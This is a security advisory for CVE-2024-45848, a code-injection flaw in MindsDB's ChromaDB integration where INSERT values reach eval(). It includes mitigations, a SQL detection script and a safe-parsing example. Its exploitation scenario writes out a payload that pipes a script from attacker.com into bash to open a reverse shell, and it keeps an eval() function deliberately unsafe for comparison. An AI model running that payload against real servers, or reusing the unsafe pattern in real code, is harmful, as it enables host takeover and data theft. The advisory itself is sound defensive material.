CVE-2024-45848: MindsDB: RCE via eval() injection in ChromaDB INSERT

HIGH | PoC AVAILABLE | CISA: ATTEND
Published September 12, 2024
CISO Take

Any authenticated user with low-privilege access to a MindsDB instance running the ChromaDB integration can execute arbitrary Python code on the server. Patch immediately to a version above 24.7.4.1, or disable the ChromaDB engine if patching is not immediately possible. Treat any exposed MindsDB instance as fully compromised until remediated.

What is the risk?

HIGH. CVSS 8.8 reflects the reality: network-accessible, low complexity, low privileges required. MindsDB is often deployed as an internal AI data layer, but 'internal' does not mean safe — lateral movement from any compromised account or insider threat is sufficient. The attack requires no user interaction and directly yields code execution on the host running the ML platform.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
mindsdb No patch

How severe is it?

CVSS 3.1: 8.8 / 10
EPSS: 0.8% chance of exploitation in 30 days (higher than 53% of all CVEs)
Exploitation Status: Exploit Available
Exploitation: MEDIUM
Sophistication: Trivial
Exploitation Confidence: medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV: Network
AC: Low
PR: Low
UI: None
S: Unchanged
C: High
I: High
A: High

What should I do?

5 steps
  1. Patch: Upgrade MindsDB to any version beyond 24.7.4.1 — the fix removes the unsafe eval() call.

  2. Workaround: If patching is not immediately possible, disable the ChromaDB integration by removing the chromadb package from the MindsDB environment and restricting CREATE DATABASE with ENGINE=chromadb.

  3. Access control: Enforce least-privilege on MindsDB database users — no user should have INSERT permissions unless explicitly required.

  4. Network segmentation: MindsDB should never be directly internet-facing; enforce firewall rules restricting access to trusted application servers only.

  5. Detection: Alert on SQL INSERT statements targeting ChromaDB engine databases, especially those containing Python builtins (import, os, subprocess, exec, eval, __import__). Monitor for anomalous process spawning from the MindsDB process.
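
A sketch of the detection in step 5, added here as an example and not MindsDB or vendor code. It assumes SQL statements are already available one per string (from a proxy or audit log; the capture method and the names `scan` and `SAMPLE` are assumptions), learns which databases use the ChromaDB engine from `CREATE DATABASE` statements, and raises the severity when an INSERT value contains the Python tokens listed above.

```python
import re

# Tokens named in the detection step; word-bounded to limit false positives.
PY_TOKENS = re.compile(r"__import__|\b(?:import|os|subprocess|exec|eval)\b")
# CREATE DATABASE <name> ... ENGINE = 'chromadb' (tracks which databases to watch).
CREATE_CHROMA = re.compile(
    r"CREATE\s+DATABASE\s+(?:IF\s+NOT\s+EXISTS\s+)?`?(\w+)`?"
    r".*?ENGINE\s*=?\s*['\"]?chromadb\b",
    re.I | re.S,
)
INSERT_INTO = re.compile(r"INSERT\s+INTO\s+`?(\w+)`?\s*\.", re.I)


def scan(statements):
    """Return (severity, statement) for each INSERT into a ChromaDB-engine database."""
    chroma_dbs, alerts = set(), []
    for stmt in statements:
        created = CREATE_CHROMA.search(stmt)
        if created:
            chroma_dbs.add(created.group(1).lower())
            continue
        insert = INSERT_INTO.search(stmt)
        if insert and insert.group(1).lower() in chroma_dbs:
            values = stmt[insert.end():]
            severity = "high" if PY_TOKENS.search(values) else "info"
            alerts.append((severity, stmt))
    return alerts


# Constructed sample statements (not real logs); the flagged value is harmless.
SAMPLE = [
    "CREATE DATABASE kb_store WITH ENGINE = 'chromadb';",
    "CREATE DATABASE sales WITH ENGINE = 'postgres';",
    "INSERT INTO kb_store.docs (content) VALUES ('quarterly report text');",
    "INSERT INTO kb_store.docs (content) VALUES ('__import__(\"os\").getcwd()');",
    "INSERT INTO sales.orders (note) VALUES ('import tax form');",
]

if __name__ == "__main__":
    for severity, stmt in scan(SAMPLE):
        print(f"[{severity}] {stmt}")
```

Databases created before the scanned window are not tracked by this sketch, so seed the set from the instance's existing database list when running it over a partial log.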

What does CISA's SSVC say?

Decision: Attend
Exploitation: poc
Automatable: No
Technical Impact: total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act: Article 15 - Accuracy, robustness and cybersecurity; Article 9 - Risk management system
ISO 42001: A.6.2.3 - AI system security; A.9.2 - Assessment of AI system
NIST AI RMF: MANAGE-2.2 - Mechanisms are in place and applied to sustain the value of deployed AI systems and manage associated risks
OWASP LLM Top 10: LLM07:2025 - System Prompt Leakage

Frequently Asked Questions

Is CVE-2024-45848 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-45848, increasing the risk of exploitation.

What systems are affected by CVE-2024-45848?

This vulnerability affects the following AI/ML architecture patterns: RAG pipelines, vector databases, AI data platforms, model serving, agent frameworks.

What is the CVSS score for CVE-2024-45848?

CVE-2024-45848 has a CVSS v3.1 base score of 8.8 (HIGH). The EPSS exploitation probability is 0.84%.

What is the AI security impact?

Affected AI Architectures

RAG pipelines, vector databases, AI data platforms, model serving, agent frameworks

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0037 Data from Local System
AML.T0049 Exploit Public-Facing Application
AML.T0050 Command and Scripting Interpreter
AML.T0072 Reverse Shell

Compliance Controls Affected

EU AI Act: Article 15, Article 9
ISO 42001: A.6.2.3, A.9.2
NIST AI RMF: MANAGE-2.2
OWASP LLM Top 10: LLM07:2025

What are the technical details?

Original Advisory

An arbitrary code execution vulnerability exists in versions 23.12.4.0 up to 24.7.4.1 of the MindsDB platform, when the ChromaDB integration is installed on the server. If a specially crafted ‘INSERT’ query containing Python code is run against a database created with the ChromaDB engine, the code will be passed to an eval function and executed on the server.

Exploitation Scenario

An attacker with valid (low-privilege) MindsDB credentials — obtained via phishing, credential stuffing, or a misconfigured default account — connects to the MindsDB SQL interface. They execute: CREATE DATABASE vuln_db WITH ENGINE='chromadb'; followed by INSERT INTO vuln_db.collection (content) VALUES ('__import__("os").system("curl attacker.com/shell.sh | bash")'). The eval() function in the ChromaDB handler executes the payload server-side, establishing a reverse shell. The attacker now has full access to the host: vector DB contents, training data, API keys in environment variables, and lateral movement paths to adjacent ML services.

Weaknesses (CWE)

CWE-94 — Improper Control of Generation of Code ('Code Injection'): The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

  • [Architecture and Design] Refactor your program so that you do not have to dynamically generate code.
  • [Architecture and Design] Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product. Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.
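
The first mitigation above, applied to the eval() pattern the advisory describes, as an added example that is not MindsDB's handler code. The function names and the assumption that the inserted value is meant to be a literal dict are hypothetical; the "before" function is kept deliberately unsafe for comparison.

```python
import ast
import json


def parse_value_unsafe(raw: str):
    """'Before' pattern: eval() runs any expression the caller supplies."""
    return eval(raw)  # deliberately vulnerable, kept for comparison only


def parse_value_safe(raw: str) -> dict:
    """'After' pattern: accept only a literal dict, never executable code."""
    try:
        value = json.loads(raw)
    except json.JSONDecodeError:
        try:
            # literal_eval accepts Python-style literals but rejects calls,
            # attribute access and bare names.
            value = ast.literal_eval(raw)
        except (ValueError, SyntaxError, TypeError,
                MemoryError, RecursionError) as exc:
            raise ValueError("value is not a literal") from exc
    if not isinstance(value, dict):
        raise ValueError("expected a dict")
    return value


def rejected(raw: str) -> bool:
    """True when the safe parser refuses the input."""
    try:
        parse_value_safe(raw)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed inputs: a harmless call stands in for attacker-supplied code.
    print(parse_value_unsafe("len('abc')"))           # the expression is executed
    print(rejected("len('abc')"))                     # the safe parser refuses it
    print(parse_value_safe("{'source': 'wiki'}"))     # literal dict is accepted
```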

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Timeline

Published: September 12, 2024
Last Modified: September 16, 2024
First Seen: September 12, 2024

Related Vulnerabilities